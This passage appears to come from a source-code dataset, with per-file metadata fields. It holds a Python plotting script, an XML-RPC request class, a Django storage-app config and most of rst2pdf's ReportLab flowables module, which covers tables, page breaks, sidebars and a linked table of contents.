super(Rating, self).__init__(**kwargs)
self.rating_value = kwargs.get('rating_value', None)
self.best_rating = None
self._type = 'Rating'
|
mit
| -4,623,109,599,950,055,000
| 32.616667
| 79
| 0.584036
| false
| 4.228512
| false
| false
| false
|
Wang-Sen/bdmap-app
|
draw.py
|
1
|
1436
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import datetime
import matplotlib.pyplot as plt
import argparse
import os
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Draw pictures based on the data of input file.')
parser.add_argument('-i', '--ifile', type=str, required=True)
parser.add_argument('-o', '--opath', type=str, required=True)
parser.add_argument('-t', '--title', type=str, required=True)
args = parser.parse_args()
x = []
y = []
old_date = ''
cur_date = ''
with open(args.ifile, 'r') as f:
for i in f.readlines():
data = i.split()
if data[0] != cur_date:
old_date = cur_date
cur_date = data[0]
if x and y:
plt.plot(x, y, label=data[0])
plt.gcf().autofmt_xdate()
plt.title(args.title + ' ' + old_date)
plt.savefig(os.path.join(args.opath, args.title + old_date + '.jpg'))
plt.clf()
x = []
y = []
x.append(datetime.datetime.strptime(data[0] + ' ' + data[1], '%Y-%m-%d %H:%M:%S'))
y.append(data[2])
plt.plot(x, y, label=data[0])
plt.gcf().autofmt_xdate()
plt.title(args.title + ' ' + cur_date)
plt.savefig(os.path.join(args.opath, args.title + cur_date + '.jpg'))
plt.clf()
|
gpl-3.0
| -5,511,461,292,612,271,000
| 34.02439
| 98
| 0.501393
| false
| 3.402844
| false
| false
| false
|
wcong/ants
|
ants/http/request/rpc.py
|
1
|
1073
|
"""
This module implements the XmlRpcRequest class, which is a more convenient class
(than Request) to generate xml-rpc requests.
See documentation in docs/topics/request-response.rst
"""
import xmlrpclib
from ants.http.request import Request
from ants.utils.python import get_func_args
DUMPS_ARGS = get_func_args(xmlrpclib.dumps)
class XmlRpcRequest(Request):
def __init__(self, *args, **kwargs):
encoding = kwargs.get('encoding', None)
if 'body' not in kwargs and 'params' in kwargs:
kw = dict((k, kwargs.pop(k)) for k in DUMPS_ARGS if k in kwargs)
kwargs['body'] = xmlrpclib.dumps(**kw)
# spec defines that requests must use POST method
kwargs.setdefault('method', 'POST')
# xmlrpc query multiples times over the same url
kwargs.setdefault('dont_filter', True)
# restore encoding
if encoding is not None:
kwargs['encoding'] = encoding
super(XmlRpcRequest, self).__init__(*args, **kwargs)
self.headers.setdefault('Content-Type', 'text/xml')
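# Illustrative usage (editor's note; the endpoint URL is hypothetical):
#
#   req = XmlRpcRequest('http://example.com/RPC2',
#                       methodname='system.listMethods', params=())
#
# 'params' and 'methodname' are popped into xmlrpclib.dumps() to build the
# POST body, since both names appear in DUMPS_ARGS.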
|
bsd-3-clause
| 4,317,994,134,569,879,000
| 29.657143
| 79
| 0.661696
| false
| 3.988848
| false
| false
| false
|
tulsluper/sanscript
|
apps/da/apps.py
|
1
|
2212
|
import os
from django.apps import AppConfig
from django.apps import apps
def samevalues(names):
records = []
for name in names:
if type(name) == str:
records.append({key: name for key in ['label', 'model', 'title']})
return records
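# e.g. (editor's note) samevalues(['Capacity']) returns
# [{'label': 'Capacity', 'model': 'Capacity', 'title': 'Capacity'}].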
pages = [
{'label': 'capacity', 'view': 'capacity', 'title': 'Capacity'},
{'label': 'capacity_history', 'view': 'capacity_history', 'title': 'Capacity History'},
{'label': 'pd_types_capacity', 'view': 'pd_types_capacity', 'title': 'PD Capacity'},
{'label': 'pd_types_quantity', 'view': 'pd_types_quantity', 'title': 'PD Quantity'},
{'label': 'capacity_3par', 'view': 'capacity_3par', 'title': '3PAR Capacity'},
{'label': 'capacity_3par_history', 'view': 'capacity_3par_history', 'title': '3PAR Capacity History'},
{'label': 'volumes', 'view': 'volumes', 'title': 'Volumes'},
{'label': 'hosts', 'view': 'hosts', 'title': 'Hosts'},
{'label': 'hosts_capacity', 'view': 'hosts_capacity', 'title': 'HostsCapacity'},
{'label': 'hosts_capacity_history', 'view': 'hosts_capacity_history', 'title': 'HostsCapacityHistory'},
{'label': 'changes', 'view': 'changes', 'title': 'Changes'},
{'label': 'change_acknowledge', 'view': 'change_acknowledge', 'title': ''},
{'label': 'change_delete', 'view': 'change_delete', 'title': ''},
]
commands = [
{'label': 'test_connections', 'title': 'Test connections'},
{'label': 'collect_data', 'title': 'Collect data'},
]
config_models = samevalues([
'StorageConnection',
])
show_models = samevalues([
'StorageConnection',
'Capacity',
'CapacityHistory',
'TPARCapacity',
'TPARCapacityHistory',
'PDTypesCapacity',
'PDTypesQuantity',
'TPARHost',
'TPARVV',
'TPARVLUN',
'EVAVdisk',
'EVAHost',
'HDSHost',
'HDSLU',
'HDSMap',
'Volume',
'Host',
'HostCapacity',
'HostCapacityHistory',
'VolumeChange',
])
class appAppConfig(AppConfig):
label = os.path.basename(os.path.dirname(os.path.realpath(__file__)))
name = 'apps.{}'.format(label)
verbose_name = 'Storages'
pages = pages
commands = commands
config_models = config_models
show_models = show_models
|
gpl-3.0
| -1,206,674,240,758,519,800
| 30.6
| 107
| 0.607595
| false
| 3.429457
| true
| false
| false
|
rst2pdf/rst2pdf
|
doc/assets/flowables.py
|
1
|
38576
|
# -*- coding: utf-8 -*-
# See LICENSE.txt for licensing terms
__docformat__ = 'reStructuredText'
from copy import copy
import re
import sys
from xml.sax.saxutils import unescape
from reportlab.lib.enums import TA_CENTER, TA_RIGHT
from reportlab.lib.styles import ParagraphStyle
from reportlab.lib.units import cm
from reportlab.platypus.doctemplate import FrameActionFlowable, FrameBreak, Indenter
from reportlab.platypus.flowables import (
_listWrapOn,
_FUZZ,
Flowable,
NullDraw,
PageBreak,
Spacer,
)
from reportlab.platypus.frames import Frame
from reportlab.platypus.paragraph import Paragraph
from reportlab.platypus.tables import Table, TableStyle
from reportlab.platypus.tableofcontents import TableOfContents
from reportlab.platypus.xpreformatted import XPreformatted
from . import styles
from .log import log
class XXPreformatted(XPreformatted):
"""An extended XPreformattedFit"""
def __init__(self, *args, **kwargs):
XPreformatted.__init__(self, *args, **kwargs)
def split(self, aW, aH):
# Figure out a nice range of splits
#
# Assume we would prefer 5 lines (at least) on
        # a split flowable before a break, and 4 on
# the last flowable after a break.
# So, the minimum wrap height for a fragment
# will be 5*leading
rW, rH = self.wrap(aW, aH)
if rH > aH:
minH1 = getattr(self.style, 'allowOrphans', 5) * self.style.leading
minH2 = getattr(self.style, 'allowWidows', 4) * self.style.leading
            # If there's no way to find a decent fragment,
# refuse to split
if aH < minH1:
return []
# Now, don't split too close to the end either
pw, ph = self.wrap(aW, aH)
if ph - aH < minH2:
aH = ph - minH2
return XPreformatted.split(self, aW, aH)
class MyIndenter(Indenter):
"""An indenter that has a width, because otherwise you get crashes
if added inside tables"""
width = 0
height = 0
def draw(self):
pass
class TocEntry(NullDraw):
"""A flowable that adds a TOC entry but draws nothing"""
def __init__(self, level, label):
self.level = level
self.label = label
self.width = 0
self.height = 0
self.keepWithNext = True
def draw(self):
# Add outline entry
self.canv.bookmarkHorizontal(self.label, 0, 0 + self.height)
self.canv.addOutlineEntry(
self.label, self.label, max(0, int(self.level)), False
)
class Heading(Paragraph):
"""A paragraph that also adds an outline entry in
the PDF TOC."""
def __init__(
self,
text,
style,
bulletText=None,
caseSensitive=1,
level=0,
snum=None,
parent_id=None,
node=None,
section_header_depth=2,
):
        # Issue 114: need to convert "&amp;" to "&" and such.
# Issue 140: need to make it plain text
self.stext = re.sub(r'<[^>]*?>', '', unescape(text))
self.stext = self.stext.strip()
self.level = int(level)
self.snum = snum
self.parent_id = parent_id
self.node = node
self.section_header_depth = section_header_depth
Paragraph.__init__(self, text, style, bulletText)
def draw(self):
# Add outline entry
self.canv.bookmarkHorizontal(self.parent_id, 0, 0 + self.height)
# self.section_header_depth is for Issue 391
if self.canv.firstSect and self.level < self.section_header_depth:
self.canv.sectName = self.stext
self.canv.firstSect = False
if self.snum is not None:
self.canv.sectNum = self.snum
else:
self.canv.sectNum = ""
self.canv.addOutlineEntry(self.stext, self.parent_id, int(self.level), False)
Paragraph.draw(self)
class Separation(Flowable):
"""A simple <hr>-like flowable"""
def wrap(self, w, h):
self.w = w
return w, 1 * cm
def draw(self):
self.canv.line(0, 0.5 * cm, self.w, 0.5 * cm)
class Reference(Flowable):
"""A flowable to insert an anchor without taking space"""
def __init__(self, refid):
self.refid = refid
self.keepWithNext = True
Flowable.__init__(self)
def wrap(self, w, h):
"""This takes no space"""
return 0, 0
def draw(self):
self.canv.bookmarkPage(self.refid)
def repr(self):
return "Reference: %s" % self.refid
def __str__(self):
return "Reference: %s" % self.refid
class OddEven(Flowable):
"""This flowable takes two lists of flowables as arguments, odd and even.
    It will draw the "odd" list when drawn on odd pages and the "even" list on
    even pages.
wrap() will always return a size large enough for both lists, and this flowable
**cannot** be split, so use with care.
"""
def __init__(self, odd, even, style=None):
self.odd = DelayedTable([[odd]], ['100%'], style)
self.even = DelayedTable([[even]], ['100%'], style)
def wrap(self, w, h):
"""Return a box large enough for both odd and even"""
w1, h1 = self.odd.wrap(w, h)
w2, h2 = self.even.wrap(w, h)
return max(w1, w2), max(h1, h2)
def drawOn(self, canvas, x, y, _sW=0):
if canvas._pagenum % 2 == 0:
self.even.drawOn(canvas, x, y, _sW)
else:
self.odd.drawOn(canvas, x, y, _sW)
def split(self):
"""Makes no sense to split this..."""
return []
class DelayedTable(Table):
"""A flowable that inserts a table for which it has the data.
Needed so column widths can be determined after we know on what frame
    the table will be inserted, thus making the overall table width correct.
"""
def __init__(self, data, colWidths, style=None, repeatrows=False, splitByRow=True):
self.data = data
self._colWidths = colWidths
if style is None:
style = TableStyle(
[
('LEFTPADDING', (0, 0), (-1, -1), 0),
('RIGHTPADDING', (0, 0), (-1, -1), 0),
('TOPPADDING', (0, 0), (-1, -1), 0),
('BOTTOMPADDING', (0, 0), (-1, -1), 0),
]
)
self.style = style
self.t = None
self.repeatrows = repeatrows
self.hAlign = TA_CENTER
self.splitByRow = splitByRow
def wrap(self, w, h):
# Create the table, with the widths from colWidths reinterpreted
# if needed as percentages of frame/cell/whatever width w is.
# _tw = w/sum(self.colWidths)
def adjust(*args, **kwargs):
kwargs['total'] = w
return styles.adjustUnits(*args, **kwargs)
# adjust=functools.partial(styles.adjustUnits, total=w)
self.colWidths = [adjust(x) for x in self._colWidths]
# colWidths = [_w * _tw for _w in self.colWidths]
self.t = Table(
self.data,
colWidths=self.colWidths,
style=self.style,
repeatRows=self.repeatrows,
splitByRow=True,
)
# splitByRow=self.splitByRow)
self.t.hAlign = self.hAlign
return self.t.wrap(w, h)
def split(self, w, h):
if self.splitByRow:
if not self.t:
self.wrap(w, h)
return self.t.split(w, h)
else:
return []
def drawOn(self, canvas, x, y, _sW=0):
self.t.drawOn(canvas, x, y, _sW)
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr(self.data[0]),
)[:180]
def tablepadding(padding):
if not isinstance(padding, (list, tuple)):
padding = [padding] * 4
return (
padding,
('TOPPADDING', [0, 0], [-1, -1], padding[0]),
('RIGHTPADDING', [-1, 0], [-1, -1], padding[1]),
('BOTTOMPADDING', [0, 0], [-1, -1], padding[2]),
('LEFTPADDING', [1, 0], [1, -1], padding[3]),
)
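# Editor's sketch: tablepadding(3) expands the scalar into per-side padding
# plus the matching TableStyle commands:
#   ([3, 3, 3, 3],
#    ('TOPPADDING', [0, 0], [-1, -1], 3),
#    ('RIGHTPADDING', [-1, 0], [-1, -1], 3),
#    ('BOTTOMPADDING', [0, 0], [-1, -1], 3),
#    ('LEFTPADDING', [1, 0], [1, -1], 3))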
class SplitTable(DelayedTable):
def __init__(self, data, colWidths, style, padding=3):
if len(data) != 1 or len(data[0]) != 2:
log.error('SplitTable can only be 1 row and two columns!')
sys.exit(1)
DelayedTable.__init__(self, data, colWidths, style)
self.padding, p1, p2, p3, p4 = tablepadding(padding)
self.style._cmds.insert(0, p1)
self.style._cmds.insert(0, p2)
self.style._cmds.insert(0, p3)
self.style._cmds.insert(0, p4)
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr(self.data[0][1])[:180],
)
def split(self, w, h):
_w, _h = self.wrap(w, h)
if _h > h: # Can't split!
# The right column data mandates the split
# Find which flowable exceeds the available height
dw = self.colWidths[0] + self.padding[1] + self.padding[3]
dh = self.padding[0] + self.padding[2]
bullet = self.data[0][0]
text = self.data[0][1]
for l in range(0, len(text)):
_, fh = _listWrapOn(text[: l + 1], w - dw, None)
if fh + dh > h:
# The lth flowable is the guilty one
# split it
_, lh = _listWrapOn(text[:l], w - dw, None)
# Workaround for Issue 180
text[l].wrap(w - dw, h - lh - dh)
l2 = text[l].split(w - dw, h - lh - dh)
if l2 == []: # Not splittable, push some to next page
if l == 0: # Can't fit anything, push all to next page
return l2
# We reduce the number of items we keep on the
# page for two reasons:
# 1) If an item is associated with the following
# item (getKeepWithNext() == True), we have
# to back up to a previous one.
# 2) If we miscalculated the size required on
# the first page (I dunno why, probably not
# counting borders properly, but we do
# miscalculate occasionally). Seems to
# have to do with nested tables, so it might
# be the extra space on the border on the
# inner table.
while l > 0:
if not text[l - 1].getKeepWithNext():
first_t = Table(
[[bullet, text[:l]]],
colWidths=self.colWidths,
style=self.style,
)
_w, _h = first_t.wrap(w, h)
if _h <= h:
break
l -= 1
if l > 0:
# Workaround for Issue 180 with wordaxe:
# if wordaxe is not None:
# l3=[Table([
# [bullet,
# text[:l]]
# ],
# colWidths=self.colWidths,
# style=self.style),
# Table([['',text[l:]]],
# colWidths=self.colWidths,
# style=self.style)]
# else:
l3 = [
first_t,
SplitTable(
[['', text[l:]]],
colWidths=self.colWidths,
style=self.style,
padding=self.padding,
),
]
else: # Everything flows
l3 = []
else:
l3 = [
Table(
[[bullet, text[:l] + [l2[0]]]],
colWidths=self.colWidths,
rowHeights=[h],
style=self.style,
)
]
if l2[1:] + text[l + 1 :]:
l3.append(
SplitTable(
[['', l2[1:] + text[l + 1 :]]],
colWidths=self.colWidths,
style=self.style,
padding=self.padding,
)
)
return l3
log.debug("Can't split splittable")
return self.t.split(w, h)
else:
return DelayedTable.split(self, w, h)
class MySpacer(Spacer):
def wrap(self, aW, aH):
w, h = Spacer.wrap(self, aW, aH)
self.height = min(aH, h)
return w, self.height
class MyPageBreak(FrameActionFlowable):
def __init__(self, templateName=None, breakTo='any'):
"""templateName switches the page template starting in the
next page.
breakTo can be 'any' 'even' or 'odd'.
'even' will break one page if the current page is odd
or two pages if it's even. That way the next flowable
will be in an even page.
'odd' is the opposite of 'even'
'any' is the default, and means it will always break
only one page.
"""
self.templateName = templateName
self.breakTo = breakTo
self.forced = False
self.extraContent = []
def frameAction(self, frame):
frame._generated_content = []
if self.breakTo == 'any': # Break only once. None if at top of page
if not frame._atTop:
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
elif self.breakTo == 'odd': # Break once if on even page, twice
# on odd page, none if on top of odd page
if frame._pagenum % 2: # odd pageNum
if not frame._atTop:
# Blank pages get no heading or footer
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(SetNextTemplate('emptyPage'))
frame._generated_content.append(PageBreak())
frame._generated_content.append(ResetNextTemplate())
frame._generated_content.append(PageBreak())
else: # even
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
elif self.breakTo == 'even': # Break once if on odd page, twice
# on even page, none if on top of even page
if frame._pagenum % 2: # odd pageNum
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(PageBreak())
else: # even
if not frame._atTop:
# Blank pages get no heading or footer
frame._generated_content.append(SetNextTemplate(self.templateName))
frame._generated_content.append(SetNextTemplate('emptyPage'))
frame._generated_content.append(PageBreak())
frame._generated_content.append(ResetNextTemplate())
frame._generated_content.append(PageBreak())
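# Hedged usage sketch (story wiring assumed, not in the original source):
#     story.append(MyPageBreak(templateName='chapterPage', breakTo='odd'))
# From an even page this emits a single PageBreak; from a non-top odd page
# it switches to the 'emptyPage' template, breaks, restores the previous
# template and breaks again, so the inserted blank page carries no header
# or footer and the next flowable starts on an odd page.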
class SetNextTemplate(Flowable):
"""Set canv.templateName when drawing.
rst2pdf uses that to switch page templates.
"""
def __init__(self, templateName=None):
self.templateName = templateName
Flowable.__init__(self)
def draw(self):
if self.templateName:
try:
self.canv.oldTemplateName = self.canv.templateName
except Exception:
self.canv.oldTemplateName = 'oneColumn'
self.canv.templateName = self.templateName
class ResetNextTemplate(Flowable):
"""Go back to the previous template.
    rst2pdf uses that to switch page templates back when
    it temporarily needed to switch to another template.
    For example, after an OddPageBreak, there can be a totally
    blank page. Those have to use emptyPage as a template,
    because they must not have headers or footers.
And then we need to switch back to whatever was used.
"""
def __init__(self):
Flowable.__init__(self)
def draw(self):
self.canv.templateName, self.canv.oldTemplateName = (
self.canv.oldTemplateName,
self.canv.templateName,
)
def wrap(self, aW, aH):
return 0, 0
class TextAnnotation(Flowable):
"""Add text annotation flowable"""
def __init__(self, *args):
self.annotationText = ""
self.position = [-1, -1, -1, -1]
if len(args) >= 1:
self.annotationText = args[0].lstrip('"').rstrip('"')
if len(args) >= 5:
self.position = args[1:]
def wrap(self, w, h):
return 0, 0
def draw(self):
# Format of Reportlab's textAnnotation():
# textAnnotation("Your content", Rect=[x_begin, y_begin, x_end, y_end], relative=1)
self.canv.textAnnotation(self.annotationText, self.position, 1)
class Transition(Flowable):
"""Wrap canvas.setPageTransition.
Sets the transition effect from the current page to the next.
"""
PageTransitionEffects = dict(
Split=['direction', 'motion'],
Blinds=['dimension'],
Box=['motion'],
Wipe=['direction'],
Dissolve=[],
Glitter=['direction'],
)
    def __init__(self, *args):
        args = list(args)  # *args arrives as a tuple; we mutate it below
        if len(args) < 1:
            args = [None, 1]  # No transition
# See if we got a valid transition effect name
if args[0] not in self.PageTransitionEffects:
log.error('Unknown transition effect name: %s' % args[0])
args[0] = None
elif len(args) == 1:
args.append(1)
# FIXME: validate more
self.args = args
def wrap(self, aw, ah):
return 0, 0
    def draw(self):
        # An invalid effect name is replaced by None in __init__; draw
        # nothing in that case to avoid a KeyError in the lookup below.
        if self.args[0] is None:
            return
        kwargs = dict(
            effectname=None, duration=1, direction=0, dimension='H', motion='I'
        )
ceff = ['effectname', 'duration'] + self.PageTransitionEffects[self.args[0]]
for argname, argvalue in zip(ceff, self.args):
kwargs[argname] = argvalue
kwargs['duration'] = int(kwargs['duration'])
kwargs['direction'] = int(kwargs['direction'])
self.canv.setPageTransition(**kwargs)
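# Hedged examples (argument order taken from PageTransitionEffects above):
#     Transition('Dissolve')      # duration defaults to 1
#     Transition('Wipe', 2, 0)    # 2 second wipe, direction 0
# draw() maps the positional args onto ['effectname', 'duration'] plus the
# effect-specific keys and forwards them to canvas.setPageTransition().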
class SmartFrame(Frame):
"""A (Hopefully) smarter frame object.
This frame object knows how to handle a two-pass
layout procedure (someday).
"""
def __init__(
self,
container,
x1,
y1,
width,
height,
leftPadding=6,
bottomPadding=6,
rightPadding=6,
topPadding=6,
id=None,
showBoundary=0,
overlapAttachedSpace=None,
_debug=None,
):
self.container = container
self.onSidebar = False
self.__s = '[%s, %s, %s, %s, %s, %s, %s, %s,]' % (
x1,
y1,
width,
height,
leftPadding,
bottomPadding,
rightPadding,
topPadding,
)
Frame.__init__(
self,
x1,
y1,
width,
height,
leftPadding,
bottomPadding,
rightPadding,
topPadding,
id,
showBoundary,
overlapAttachedSpace,
_debug,
)
def add(self, flowable, canv, trySplit=0):
flowable._atTop = self._atTop
return Frame.add(self, flowable, canv, trySplit)
def __repr__(self):
return self.__s
def __deepcopy__(self, *whatever):
return copy(self)
class FrameCutter(FrameActionFlowable):
def __init__(self, dx, width, flowable, padding, lpad, floatLeft=True):
self.width = width
self.dx = dx
self.f = flowable
self.padding = padding
self.lpad = lpad
self.floatLeft = floatLeft
def frameAction(self, frame):
idx = frame.container.frames.index(frame)
if self.floatLeft:
# Don't bother inserting a silly thin frame
if self.width - self.padding > 30:
f1 = SmartFrame(
frame.container,
frame._x1 + self.dx - 2 * self.padding,
frame._y2 - self.f.height - 3 * self.padding,
self.width + 2 * self.padding,
self.f.height + 3 * self.padding,
bottomPadding=0,
topPadding=0,
leftPadding=self.lpad,
)
f1._atTop = frame._atTop
# This is a frame next to a sidebar.
f1.onSidebar = True
frame.container.frames.insert(idx + 1, f1)
# Don't add silly thin frame
if frame._height - self.f.height - 2 * self.padding > 30:
frame.container.frames.insert(
idx + 2,
SmartFrame(
frame.container,
frame._x1,
frame._y1p,
self.width + self.dx,
frame._height - self.f.height - 3 * self.padding,
topPadding=0,
),
)
else:
# Don't bother inserting a silly thin frame
if self.width - self.padding > 30:
f1 = SmartFrame(
frame.container,
frame._x1 - self.width,
frame._y2 - self.f.height - 2 * self.padding,
self.width,
self.f.height + 2 * self.padding,
bottomPadding=0,
topPadding=0,
rightPadding=self.lpad,
)
f1._atTop = frame._atTop
# This is a frame next to a sidebar.
f1.onSidebar = True
frame.container.frames.insert(idx + 1, f1)
if frame._height - self.f.height - 2 * self.padding > 30:
frame.container.frames.insert(
idx + 2,
SmartFrame(
frame.container,
frame._x1 - self.width,
frame._y1p,
self.width + self.dx,
frame._height - self.f.height - 2 * self.padding,
topPadding=0,
),
)
class Sidebar(FrameActionFlowable):
def __init__(self, flowables, style):
self.style = style
self.width = self.style.width
self.flowables = flowables
def frameAction(self, frame):
if self.style.float not in ('left', 'right'):
return
if frame.onSidebar: # We are still on the frame next to a sidebar!
frame._generated_content = [FrameBreak(), self]
else:
w = frame.container.styles.adjustUnits(self.width, frame.width)
idx = frame.container.frames.index(frame)
padding = self.style.borderPadding
width = self.style.width
self.style.padding = frame.container.styles.adjustUnits(
str(padding), frame.width
)
self.style.width = frame.container.styles.adjustUnits(
str(width), frame.width
)
self.kif = BoxedContainer(self.flowables, self.style)
if self.style.float == 'left':
self.style.lpad = frame.leftPadding
f1 = SmartFrame(
frame.container,
frame._x1,
frame._y1p,
w - 2 * self.style.padding,
frame._y - frame._y1p,
leftPadding=self.style.lpad,
rightPadding=0,
bottomPadding=0,
topPadding=0,
)
f1._atTop = frame._atTop
frame.container.frames.insert(idx + 1, f1)
frame._generated_content = [
FrameBreak(),
self.kif,
FrameCutter(
w,
frame.width - w,
self.kif,
padding,
self.style.lpad,
True,
),
FrameBreak(),
]
elif self.style.float == 'right':
self.style.lpad = frame.rightPadding
frame.container.frames.insert(
idx + 1,
SmartFrame(
frame.container,
frame._x1 + frame.width - self.style.width,
frame._y1p,
w,
frame._y - frame._y1p,
rightPadding=self.style.lpad,
leftPadding=0,
bottomPadding=0,
topPadding=0,
),
)
frame._generated_content = [
FrameBreak(),
self.kif,
FrameCutter(
w,
frame.width - w,
self.kif,
padding,
self.style.lpad,
False,
),
FrameBreak(),
]
class BoundByWidth(Flowable):
"""Limit a list of flowables by width.
This still lets the flowables break over pages and frames.
"""
    def __init__(self, maxWidth, content=None, style=None, mode=None, scale=None):
        self.maxWidth = maxWidth
        # Use None as the default to avoid a shared mutable default argument.
        self.content = content if content is not None else []
self.style = style
self.mode = mode
self.pad = None
self.scale = scale
Flowable.__init__(self)
def border_padding(self, useWidth, additional):
        sdict = self.style
        # self.style may be None; fall back to an empty dict in that case.
        sdict = sdict.__dict__ if sdict else {}
        bp = sdict.get("borderPadding", 0)
if useWidth:
additional += sdict.get("borderWidth", 0)
if not isinstance(bp, list):
bp = [bp] * 4
return [x + additional for x in bp]
def identity(self, maxLen=None):
return "<%s at %s%s%s> containing: %s" % (
self.__class__.__name__,
hex(id(self)),
self._frameName(),
getattr(self, 'name', '')
and (' name="%s"' % getattr(self, 'name', ''))
or '',
repr([c.identity() for c in self.content])[:80],
)
def wrap(self, availWidth, availHeight):
"""If we need more width than we have, complain, keep a scale"""
self.pad = self.border_padding(True, 0.1)
maxWidth = float(
min(
styles.adjustUnits(self.maxWidth, availWidth) or availWidth,
availWidth,
)
)
self.maxWidth = maxWidth
maxWidth -= self.pad[1] + self.pad[3]
self.width, self.height = _listWrapOn(
self.content, maxWidth, None, fakeWidth=False
)
if self.width > maxWidth:
if self.mode != 'shrink':
self.scale = 1.0
log.warning(
"BoundByWidth too wide to fit in frame (%s > %s): %s",
self.width,
maxWidth,
self.identity(),
)
if self.mode == 'shrink' and not self.scale:
self.scale = (maxWidth + self.pad[1] + self.pad[3]) / (
self.width + self.pad[1] + self.pad[3]
)
else:
self.scale = 1.0
self.height *= self.scale
self.width *= self.scale
return (
self.width,
self.height + (self.pad[0] + self.pad[2]) * self.scale,
)
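    # Worked example of the shrink branch above (illustrative numbers):
    # with an effective maxWidth of 380 after subtracting pad[1] + pad[3]
    # == 20, content that wraps to width 500 gets
    #     scale = (380 + 20) / (500 + 20) ~= 0.769
    # and the reported size is the wrapped size times that scale (plus the
    # scaled top/bottom padding on the height).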
def split(self, availWidth, availHeight):
if not self.pad:
self.wrap(availWidth, availHeight)
content = self.content
if len(self.content) == 1:
# We need to split the only element we have
content = content[0].split(
availWidth - (self.pad[1] + self.pad[3]),
availHeight - (self.pad[0] + self.pad[2]),
)
result = [
BoundByWidth(self.maxWidth, [f], self.style, self.mode, self.scale)
for f in content
]
return result
def draw(self):
"""we simulate being added to a frame"""
canv = self.canv
canv.saveState()
x = canv._x
y = canv._y
_sW = 0
scale = self.scale
content = None
pS = 0
aW = self.width
aW = scale * (aW + _sW)
if content is None:
content = self.content
y += (self.height + self.pad[2]) / scale
x += self.pad[3]
for c in content:
w, h = c.wrapOn(canv, aW, 0xFFFFFFF)
if (w < _FUZZ or h < _FUZZ) and not getattr(c, '_ZEROSIZE', None):
continue
if c is not content[0]:
h += max(c.getSpaceBefore() - pS, 0)
y -= h
canv.saveState()
if self.mode == 'shrink':
canv.scale(scale, scale)
elif self.mode == 'truncate':
p = canv.beginPath()
p.rect(
x - self.pad[3],
y - self.pad[2],
self.maxWidth,
self.height + self.pad[0] + self.pad[2],
)
canv.clipPath(p, stroke=0)
c.drawOn(canv, x, y, _sW=aW - w)
canv.restoreState()
if c is not content[-1]:
pS = c.getSpaceAfter()
y -= pS
canv.restoreState()
class BoxedContainer(BoundByWidth):
def __init__(self, content, style, mode='shrink'):
try:
w = style.width
except AttributeError:
w = '100%'
BoundByWidth.__init__(self, w, content, mode=mode, style=None)
self.style = style
self.mode = mode
def identity(self, maxLen=None):
return repr(
['BoxedContainer containing: ', [c.identity() for c in self.content]]
)[:80]
def draw(self):
canv = self.canv
canv.saveState()
x = canv._x
y = canv._y
lw = 0
if self.style and self.style.borderWidth > 0:
lw = self.style.borderWidth
canv.setLineWidth(self.style.borderWidth)
if self.style.borderColor: # This could be None :-(
canv.setStrokeColor(self.style.borderColor)
stroke = 1
else:
stroke = 0
else:
stroke = 0
if self.style and self.style.backColor:
canv.setFillColor(self.style.backColor)
fill = 1
else:
fill = 0
padding = self.border_padding(False, lw)
xpadding = padding[1] + padding[3]
ypadding = padding[0] + padding[2]
p = canv.beginPath()
p.rect(x, y, self.width + xpadding, self.height + ypadding)
canv.drawPath(p, stroke=stroke, fill=fill)
canv.restoreState()
BoundByWidth.draw(self)
def split(self, availWidth, availHeight):
self.wrap(availWidth, availHeight)
padding = (self.pad[1] + self.pad[3]) * self.scale
if self.height + padding <= availHeight:
return [self]
else:
# Try to figure out how many elements
# we can put in the available space
candidate = None
remainder = None
for p in range(1, len(self.content)):
b = BoxedContainer(self.content[:p], self.style, self.mode)
w, h = b.wrap(availWidth, availHeight)
if h < availHeight:
candidate = b
if self.content[p:]:
remainder = BoxedContainer(
self.content[p:], self.style, self.mode
)
else:
break
if not candidate or not remainder: # Nothing fits, break page
return []
if not remainder: # Everything fits?
return [self]
return [candidate, remainder]
class MyTableOfContents(TableOfContents):
"""
Subclass of reportlab.platypus.tableofcontents.TableOfContents
which supports hyperlinks to corresponding sections.
"""
def __init__(self, *args, **kwargs):
# The parent argument is to define the locality of
# the TOC. If it's none, it's a global TOC and
# any heading it's notified about is accepted.
# If it's a node, then the heading needs to be "inside"
# that node. This can be figured out because
# the heading flowable keeps a reference to the title
        # node it was created from.
#
# Yes, this is gross.
self.parent = kwargs.pop('parent')
TableOfContents.__init__(self, *args, **kwargs)
# reference ids for which this TOC should be notified
self.refids = []
        # reverse lookup table from (level, text, pageNum) to refid
self.refid_lut = {}
self.linkColor = "#0000ff"
def notify(self, kind, stuff):
        # stuff includes (level, text, pageNum, label, node)
level, text, pageNum, label, node = stuff
rlabel = '-'.join(label.split('-')[:-1])
def islocal(_node):
"""See if this node is "local enough" for this TOC.
This is for Issue 196"""
if self.parent is None:
return True
while _node.parent:
if _node.parent == self.parent:
return True
_node = _node.parent
return False
if rlabel in self.refids and islocal(node):
self.addEntry(level, text, pageNum)
self.refid_lut[(level, text, pageNum)] = label
def wrap(self, availWidth, availHeight):
"""Adds hyperlink to toc entry."""
widths = (availWidth - self.rightColumnWidth, self.rightColumnWidth)
# makes an internal table which does all the work.
# we draw the LAST RUN's entries! If there are
# none, we make some dummy data to keep the table
# from complaining
if len(self._lastEntries) == 0:
_tempEntries = [(0, 'Placeholder for table of contents', 0, None)]
else:
_tempEntries = self._lastEntries
if _tempEntries:
base_level = _tempEntries[0][0]
else:
base_level = 0
tableData = []
for entry in _tempEntries:
level, text, pageNum = entry[:3]
left_col_level = level - base_level
leftColStyle = self.getLevelStyle(left_col_level)
label = self.refid_lut.get((level, text, pageNum), None)
if label:
pre = u'<a href="#%s" color="%s">' % (label, self.linkColor)
post = u'</a>'
if isinstance(text, bytes):
text = text.decode('utf-8')
text = pre + text + post
else:
pre = ''
post = ''
